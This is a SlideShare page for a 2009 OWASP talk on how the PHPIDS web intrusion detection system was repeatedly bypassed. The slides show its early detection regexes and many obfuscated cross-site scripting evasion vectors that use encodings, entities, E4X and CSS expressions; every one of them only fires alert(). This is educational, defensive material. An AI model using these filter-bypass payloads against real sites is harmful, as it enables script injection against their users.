SlideShare ist ein Scribd-Unternehmen logo

The Ultimate IDS Smackdown

Mario Heiderich
Mario Heiderich
TechnologieUnterhaltung & Humor
1 von 31
Downloaden Sie, um offline zu lesen
A hopefully amusing and edutaining talk by  Gareth Heyes and Mario Heiderich  for OWASP London, 07.2009
Who are we? Gareth Heyes Founder of Businessinfo web security Contracts for Microsoft testing the XSS filter Creator of Hackvertor & other security tools Enjoys hacking Javascript  Mario Heiderich  Co-founder and lead-dev of the PHPIDS Websecurity and secure development geek CTO for Business IN Inc. Freelance security researcher Believes in the infinite power of markup
What... is this talk? A short intro in the PHPIDS A travel from the very beginning to today's state Accompanied by a constant state of "being owned" ...positive ownage  ...and details on the ownage Some words on red vs. blue situations in (web) security And a conclusion that maybe might  ... change or view on web security  ... help some to get out of their boxes ... and discover values greater than proprietary And ... a rather dirty and sweaty cage fight
In the blue corner... Announces a new IDS approach  Thinks it knows the web after years of experience Did read a lot of PDFs about the interwebs - even clicked once or twice on what appeared to be a link. 
In the red corner... Thinks blue team is crazy Doubts that blacklists can detect attacks Placed the malicious link the blue team courageously clicked on Was told by (had to be removed) in a dream it knows everything Likes the Matrix
Some history lessons First PHPIDS version - the 0.0.1  from 03/2007 (["|'][s]*>) //finds html breaking injections including whitespace attacks (["|'][s]*<) //finds attribute breaking injections including whitespace attacks (+A[w]{2}-) //finds utf7 attacks in general (&#[w]+) //detects all entitites including the bizarro IE US-ASCII entitites ([w]{3}) //detects the IE hex entities (("|')[s]*()|})) //finds closing javascript breaker including whitespace attacks (((|{)[s]*("|')) //finds opening javascript breaker including whitespace attacks (../..) //detects basic directory traversal (%[w]{2}) //detects urlencoded attacks (=//) //detects protocol relative url inclusions (¼/) //detects US-ASCII HTML breaking code (@import|;base64|alert() //detects imported poisoned stylesheets, base64 attacks and all alerts (>[w]=/) //detects malformed attribute utilizing script includes ((?<)|()>)) //detects nullparam and numeric includes Receives sympathy bonus for being so adorable!  It didn't even have a name back then...
Any good fighter requires the right tools Enter the PHP Charset Encoder Converts charsets Encoding and conversion Entities & lots of them Is it enough? Hackvertor Inspired by the PCE Layered encoding Tag based conversion JS fuzzing & testing Enables crazy vector creation
Lets get ready to rumble....
First round of the fight It didn't look too bad for the blue team Life was easy back them Some simple "><script>alert(/XSS/)</script> And a little bit of 'OR1=1-- The simple and bright world of kindergarten-level injections If we don't know obfuscation, it does not exist!    But then...
Inside the script tag Sirdarckcat's innocent question:-   "Why not detect all forms of attack? Insert a script tag and detect malicious code" The blue team said yes... All hell broke loose...
It all began with strings s1=''+"jav"+'';s2=''+"ascri"+'';s3=''+"pt"+''; s4=''==''?':': 0;s5=''+"aler"+'';s6=''+"t"+'';s7=''==''?'(1)': 0;s8=s1+s2+s3+s4+s5+s6+s7;URL=s8 _=alert,1,1,_(1); c4=1==1&&'(1)';c3=1==1&&'aler'; c2=1==1&&':';c1=1==1&&'javascript'; a=c1+c2+c3+'t'+c4;(URL=a);
How many ways to create a string? Single/double quotes Regular expressions Arrays are strings Array constructors are strings Firefox specific hacks Backslash multiline strings DOM properties galore E4X Octal, unicode hex Escapes
alert(1) examples Octal, hex and Unicode escapes:- '141154145162164506151' 'x61x6cx65x72x74x28x31x29' 'u0061u006cu0065u0072u0074u0028u0031u0029' RegExps:- /alert(1)/.source /alert(1)/[-1] // FF only E4X:- <>&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;</> <>&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;</>
Browser bugs are your friend Firefox 2 supported encoding of parenthesis using unicode escapes. alert(1)== u0061u006cu0065u0072u0074u0028u0031u0029 E4X - every object has e4x properties! Bug? (!1..@*::abc?alert:1..@*::xyz)(1) Eval method linked to every object, that was fun (0)['eval']('alert(1)') Data URLs used to inherit domain injected on - sometimes they still do
So - what to do at this point? What do you say blue team? Give up? Or.. maybe...give up? Or... Face the problem and canonicalize!
We chose... The latter Because of the breast-hair (native - not implanted). And introduced the Converter That was around late spring 2008 May 2008 to precise in rev .899 We could now convert and canonicalize the strings before hitting the rules Keeping the core rules slim - and the blue team prepared for more vector madness
Time for entity and encoding fun.... Oh noez - the red team reacts! Malformed entities Zero padded Mixed hex/dec Encoded data urls Base64 - fun fact: that really generated headaches for the blue team Unexpected unicode characters Unicode spaces  Allowed padding   a&#8205lert(1) // FF2 stuff ale&zwj;rt(1) // Zero width joiner FF2
Entity fun continued.... Double encoded entities <isindex/type=image xyz=&lt; iframe/src=javascript&amp;#x3a&amp; #x61lert&amp;#x28&amp;#x31&amp;#x29&gt; onerror=undefined,///,outerHTML=xyz src=1> <img title=javascript:&amp;#97lert(1) src="x" alt="y"onerror=undefined,[undefined, [UR&#76&#61title],undefined]>
Forgotten features Getters/Setters  o={b setter:Function}.b='alertx28x31x29'; new o Language attribute IE  <body/id="1"onload=MsgBox+"xss" language=vbs> Data Islands, HTC, HTA... Ways to change the location  Detect location=name w/o false alerts for a start JS based CSS expressions document.styleSheets(0).cssText=name HTML encoded comments in javascript! <body onload=&lt;!--&#10alert(1)>
Pre-implemented future features and standards Video/Audio tags New events onurlflip, ononline, onbounce, oncellchange... CSS Expression closures Array extras New String functions E4X self injecting vectors - Bypasses Mozilla CSP <html><head> <title>CSP e4x injection</title> <script src="#"></script> </head><body>{alert(1)}</body></html>
JavaScript is weird Math operations on functions +alert(1);alert(1)++;.1.*in<></>in{}in[] in~alert('mmmmm js weirdness')++in~[] Strings out of large numbers top[(Number.MAX_VALUE/45268).toString(36). slice(15,19)]((Number.MAX_VALUE/99808). toString(36).slice(71,76)+'("XSS")') Getting window (0,[].sort)();(1,[].reverse)();// FF only Yosuke Hasegawa script without a-z0-9  (Å='',[Ç=!(µ=!Å+Å)+{}][Ç[ª=µ[++Å]+µ[Å-Å],È=Å-~Å]+Ç [È+È]+ª])()[Ç[Å]+Ç[Å+Å]+µ[È]+ª](Å) Expressions <div style="00078073 s:e&#92&#120p&#47;&#42;&#106;&#42;&#47; 0007200065 ssion(window.x?0:(alert(/XSS/),window.x=1));"></div>
Ssso, what did we learn today
You'll never get what you expect Defending against the stuff you know doesn't make you safe Web technologies are rocket science, browsers are monsters Building an IDS is no fire and forget job
Web technologies aren't pandora's box... they just support it too
An IDS is a constantly evolving middleware Cover the RFCs, brower capabilities, web app peculiarities, encoding quirks, application bugs, etc. etc. There is no golden path to stride on Long release cycles are a no-go Stable trunk versus monthly releases
Community IDS versus commercial products Where are the smoketests, where are the challenges Where's the hive mind knowledge Utilizing pressure for better product quality Faster fixes New approaches Better communication with users amd attackers And a lot of WAFs with questionable XSS protection  No vendor names.. no worries :) WafW00f, XSS on vendor sites, obvious circumventions
Quintessence »Bruce Schneier«
Maybe... Security - especially web sec is no lone wolf mission Locking away the rules and best practices don't always work Without community support it's hard to create a grown and capable product Link with the attackers
Generate communities  and challenges It's a win-win anyway The vulnerabilities are in the design - patches can't heal the patient Give credit and admit that 100% security just ain't possible Spread knowledge to avoid having it wither
Credits Talking about credits  Thanks to  Christian, Lars, sdc, thornmaker, ma1, lightos, Reiners, Kishor, Martin Hinks,tx, rvdh, beford, the Schokokeks team and all the other people who helped building, attacking and hardening the PHPIDS... And why not give us a small visit http://php-ids.org http://thespanner.co.uk http://sla.ckers.org/forum/list.php?24
That's it for now - thanks!   Red team couldn't resist.....   Image() . ownerDocument . documentElement . innerHTML+=name The red team - attempting to infiltrate the blue team's camp

Empfohlen

The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010
Mario Heiderich
 
Locking the Throneroom 2.0
Locking the Throneroom 2.0Locking the Throneroom 2.0
Locking the Throneroom 2.0
Mario Heiderich
 
A XSSmas carol
A XSSmas carolA XSSmas carol
A XSSmas carol
cgvwzq
 
Scriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the SillScriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the Sill
Mario Heiderich
 
In the DOM, no one will hear you scream
In the DOM, no one will hear you screamIn the DOM, no one will hear you scream
In the DOM, no one will hear you scream
Mario Heiderich
 
Generic Attack Detection - ph-Neutral 0x7d8
Generic Attack Detection - ph-Neutral 0x7d8Generic Attack Detection - ph-Neutral 0x7d8
Generic Attack Detection - ph-Neutral 0x7d8
Mario Heiderich
 
Dev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT SecurityDev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT Security
Mario Heiderich
 
The Image that called me - Active Content Injection with SVG Files
The Image that called me - Active Content Injection with SVG FilesThe Image that called me - Active Content Injection with SVG Files
The Image that called me - Active Content Injection with SVG Files
Mario Heiderich
 

Empfohlen

The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010
Mario Heiderich
 
Locking the Throneroom 2.0
Locking the Throneroom 2.0Locking the Throneroom 2.0
Locking the Throneroom 2.0
Mario Heiderich
 
A XSSmas carol
A XSSmas carolA XSSmas carol
A XSSmas carol
cgvwzq
 
Scriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the SillScriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the Sill
Mario Heiderich
 
In the DOM, no one will hear you scream
In the DOM, no one will hear you screamIn the DOM, no one will hear you scream
In the DOM, no one will hear you scream
Mario Heiderich
 
Generic Attack Detection - ph-Neutral 0x7d8
Generic Attack Detection - ph-Neutral 0x7d8Generic Attack Detection - ph-Neutral 0x7d8
Generic Attack Detection - ph-Neutral 0x7d8
Mario Heiderich
 
Dev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT SecurityDev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT Security
Mario Heiderich
 
The Image that called me - Active Content Injection with SVG Files
The Image that called me - Active Content Injection with SVG FilesThe Image that called me - Active Content Injection with SVG Files
The Image that called me - Active Content Injection with SVG Files
Mario Heiderich
 
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Mario Heiderich
 
I thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupI thought you were my friend - Malicious Markup
I thought you were my friend - Malicious Markup
Mario Heiderich
 
The innerHTML Apocalypse
The innerHTML ApocalypseThe innerHTML Apocalypse
The innerHTML Apocalypse
Mario Heiderich
 
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Mario Heiderich
 
HTML5 - The Good, the Bad, the Ugly
HTML5 - The Good, the Bad, the UglyHTML5 - The Good, the Bad, the Ugly
HTML5 - The Good, the Bad, the Ugly
Mario Heiderich
 
An Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSAn Abusive Relationship with AngularJS
An Abusive Relationship with AngularJS
Mario Heiderich
 
JavaScript From Hell - CONFidence 2.0 2009
JavaScript From Hell - CONFidence 2.0 2009JavaScript From Hell - CONFidence 2.0 2009
JavaScript From Hell - CONFidence 2.0 2009
Mario Heiderich
 
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
Mario Heiderich
 
Breaking AngularJS Javascript sandbox
Breaking AngularJS Javascript sandboxBreaking AngularJS Javascript sandbox
Breaking AngularJS Javascript sandbox
Mathias Karlsson
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS Vectors
Rodolfo Assis (Brute)
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPra
Mathias Karlsson
 
Defcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanningDefcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanning
zulla
 
Developer's Guide to JavaScript and Web Cryptography
Developer's Guide to JavaScript and Web CryptographyDeveloper's Guide to JavaScript and Web Cryptography
Developer's Guide to JavaScript and Web Cryptography
Kevin Hakanson
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?
Yurii Bilyk
 
Reverse Engineering Malicious Javascript
Reverse Engineering Malicious JavascriptReverse Engineering Malicious Javascript
Reverse Engineering Malicious Javascript
Yusuf Motiwala
 
MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...
MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...
MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...
MMT - Multimediatreff
 
Mario heiderich. got your nose! how to steal your precious data without using...
Mario heiderich. got your nose! how to steal your precious data without using...Mario heiderich. got your nose! how to steal your precious data without using...
Mario heiderich. got your nose! how to steal your precious data without using...
Yury Chemerkin
 
Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007
Stephan Chenette
 
Security and why you need to review yours.
Security and why you need to review yours.Security and why you need to review yours.
Security and why you need to review yours.
David Busby, CISSP
 
Clean Code
Clean CodeClean Code
Clean Code
ISchwarz23
 
OWASP PHPIDS talk slides
OWASP PHPIDS talk slidesOWASP PHPIDS talk slides
OWASP PHPIDS talk slides
guestd34230
 
Pki by Steve Lamb
Pki by Steve LambPki by Steve Lamb
Pki by Steve Lamb
Information Security Awareness Group
 

Weitere ähnliche Inhalte

Was ist angesagt?

Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Mario Heiderich
 
I thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupI thought you were my friend - Malicious Markup
I thought you were my friend - Malicious Markup
Mario Heiderich
 
The innerHTML Apocalypse
The innerHTML ApocalypseThe innerHTML Apocalypse
The innerHTML Apocalypse
Mario Heiderich
 
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Mario Heiderich
 
HTML5 - The Good, the Bad, the Ugly
HTML5 - The Good, the Bad, the UglyHTML5 - The Good, the Bad, the Ugly
HTML5 - The Good, the Bad, the Ugly
Mario Heiderich
 
JavaScript From Hell - CONFidence 2.0 2009
JavaScript From Hell - CONFidence 2.0 2009JavaScript From Hell - CONFidence 2.0 2009
JavaScript From Hell - CONFidence 2.0 2009
Mario Heiderich
 
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
Mario Heiderich
 
Defcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanningDefcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanning
zulla
 
Developer's Guide to JavaScript and Web Cryptography
Developer's Guide to JavaScript and Web CryptographyDeveloper's Guide to JavaScript and Web Cryptography
Developer's Guide to JavaScript and Web Cryptography
Kevin Hakanson
 
Mario heiderich. got your nose! how to steal your precious data without using...
Mario heiderich. got your nose! how to steal your precious data without using...Mario heiderich. got your nose! how to steal your precious data without using...
Mario heiderich. got your nose! how to steal your precious data without using...
Yury Chemerkin
 
Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007
Stephan Chenette
 

Was ist angesagt? (20)

Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
 
I thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupI thought you were my friend - Malicious Markup
I thought you were my friend - Malicious Markup
 
The innerHTML Apocalypse
The innerHTML ApocalypseThe innerHTML Apocalypse
The innerHTML Apocalypse
 
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
 
HTML5 - The Good, the Bad, the Ugly
HTML5 - The Good, the Bad, the UglyHTML5 - The Good, the Bad, the Ugly
HTML5 - The Good, the Bad, the Ugly
 
An Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSAn Abusive Relationship with AngularJS
An Abusive Relationship with AngularJS
 
JavaScript From Hell - CONFidence 2.0 2009
JavaScript From Hell - CONFidence 2.0 2009JavaScript From Hell - CONFidence 2.0 2009
JavaScript From Hell - CONFidence 2.0 2009
 
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
 
Breaking AngularJS Javascript sandbox
Breaking AngularJS Javascript sandboxBreaking AngularJS Javascript sandbox
Breaking AngularJS Javascript sandbox
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS Vectors
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPra
 
Defcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanningDefcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanning
 
Developer's Guide to JavaScript and Web Cryptography
Developer's Guide to JavaScript and Web CryptographyDeveloper's Guide to JavaScript and Web Cryptography
Developer's Guide to JavaScript and Web Cryptography
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?
 
Reverse Engineering Malicious Javascript
Reverse Engineering Malicious JavascriptReverse Engineering Malicious Javascript
Reverse Engineering Malicious Javascript
 
MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...
MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...
MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...
 
Mario heiderich. got your nose! how to steal your precious data without using...
Mario heiderich. got your nose! how to steal your precious data without using...Mario heiderich. got your nose! how to steal your precious data without using...
Mario heiderich. got your nose! how to steal your precious data without using...
 
Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007
 
Security and why you need to review yours.
Security and why you need to review yours.Security and why you need to review yours.
Security and why you need to review yours.
 
Clean Code
Clean CodeClean Code
Clean Code
 

Ähnlich wie The Ultimate IDS Smackdown

OWASP PHPIDS talk slides
OWASP PHPIDS talk slidesOWASP PHPIDS talk slides
OWASP PHPIDS talk slides
guestd34230
 
Positive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-raysPositive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-rays
qqlan
 
주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법
guestad13b55
 
Simplest-Ownage-Human-Observed… - Routers
Simplest-Ownage-Human-Observed… - Routers Simplest-Ownage-Human-Observed… - Routers
Simplest-Ownage-Human-Observed… - Routers
Logicaltrust pl
 
Filip palian mateuszkocielski. simplest ownage human observed… routers
Filip palian mateuszkocielski. simplest ownage human observed… routersFilip palian mateuszkocielski. simplest ownage human observed… routers
Filip palian mateuszkocielski. simplest ownage human observed… routers
Yury Chemerkin
 
Security module for php7 – Killing bugclasses and virtual-patching the rest! ...
Security module for php7 – Killing bugclasses and virtual-patching the rest! ...Security module for php7 – Killing bugclasses and virtual-patching the rest! ...
Security module for php7 – Killing bugclasses and virtual-patching the rest! ...
44CON
 
Black ops of tcp2005 japan
Black ops of tcp2005 japanBlack ops of tcp2005 japan
Black ops of tcp2005 japan
Dan Kaminsky
 
How to write clean & testable code without losing your mind
How to write clean & testable code without losing your mindHow to write clean & testable code without losing your mind
How to write clean & testable code without losing your mind
Andreas Czakaj
 
Blue team reboot - HackFest
Blue team reboot - HackFest Blue team reboot - HackFest
Blue team reboot - HackFest
Haydn Johnson
 

Ähnlich wie The Ultimate IDS Smackdown (20)

OWASP PHPIDS talk slides
OWASP PHPIDS talk slidesOWASP PHPIDS talk slides
OWASP PHPIDS talk slides
 
Pki by Steve Lamb
Pki by Steve LambPki by Steve Lamb
Pki by Steve Lamb
 
Hackers vs developers
Hackers vs developersHackers vs developers
Hackers vs developers
 
[KGC 2010] 게임과 보안, 암호 알고리즘과 프로토콜
[KGC 2010] 게임과 보안, 암호 알고리즘과 프로토콜[KGC 2010] 게임과 보안, 암호 알고리즘과 프로토콜
[KGC 2010] 게임과 보안, 암호 알고리즘과 프로토콜
 
BCS_PKI_part1.ppt
BCS_PKI_part1.pptBCS_PKI_part1.ppt
BCS_PKI_part1.ppt
 
[Wroclaw #7] Why So Serial?
[Wroclaw #7] Why So Serial?[Wroclaw #7] Why So Serial?
[Wroclaw #7] Why So Serial?
 
Positive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-raysPositive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-rays
 
2 Roads to Redemption - Thoughts on XSS and SQLIA
2 Roads to Redemption - Thoughts on XSS and SQLIA2 Roads to Redemption - Thoughts on XSS and SQLIA
2 Roads to Redemption - Thoughts on XSS and SQLIA
 
Security & Cryptography In Linux
Security & Cryptography In LinuxSecurity & Cryptography In Linux
Security & Cryptography In Linux
 
주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법
 
Trust boundaries - Confidence 2015
Trust boundaries - Confidence 2015Trust boundaries - Confidence 2015
Trust boundaries - Confidence 2015
 
SQL/JavaScript Hybrid Worms As Two-stage Quines
SQL/JavaScript Hybrid Worms As Two-stage Quines SQL/JavaScript Hybrid Worms As Two-stage Quines
SQL/JavaScript Hybrid Worms As Two-stage Quines
 
Simplest-Ownage-Human-Observed… - Routers
Simplest-Ownage-Human-Observed… - Routers Simplest-Ownage-Human-Observed… - Routers
Simplest-Ownage-Human-Observed… - Routers
 
Filip palian mateuszkocielski. simplest ownage human observed… routers
Filip palian mateuszkocielski. simplest ownage human observed… routersFilip palian mateuszkocielski. simplest ownage human observed… routers
Filip palian mateuszkocielski. simplest ownage human observed… routers
 
Security module for php7 – Killing bugclasses and virtual-patching the rest! ...
Security module for php7 – Killing bugclasses and virtual-patching the rest! ...Security module for php7 – Killing bugclasses and virtual-patching the rest! ...
Security module for php7 – Killing bugclasses and virtual-patching the rest! ...
 
Applied machine learning defeating modern malicious documents
Applied machine learning defeating modern malicious documentsApplied machine learning defeating modern malicious documents
Applied machine learning defeating modern malicious documents
 
Black ops of tcp2005 japan
Black ops of tcp2005 japanBlack ops of tcp2005 japan
Black ops of tcp2005 japan
 
How to hide your browser 0-days
How to hide your browser 0-daysHow to hide your browser 0-days
How to hide your browser 0-days
 
How to write clean & testable code without losing your mind
How to write clean & testable code without losing your mindHow to write clean & testable code without losing your mind
How to write clean & testable code without losing your mind
 
Blue team reboot - HackFest
Blue team reboot - HackFest Blue team reboot - HackFest
Blue team reboot - HackFest
 

Kürzlich hochgeladen

Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
UK Journal
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Drew Madelung
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
vu2urc
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
Principled Technologies
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
sammart93
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
Enterprise Knowledge
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
Earley Information Science
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
Enterprise Knowledge
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
Delhi Call girls
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
Delhi Call girls
 

Kürzlich hochgeladen (20)

Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
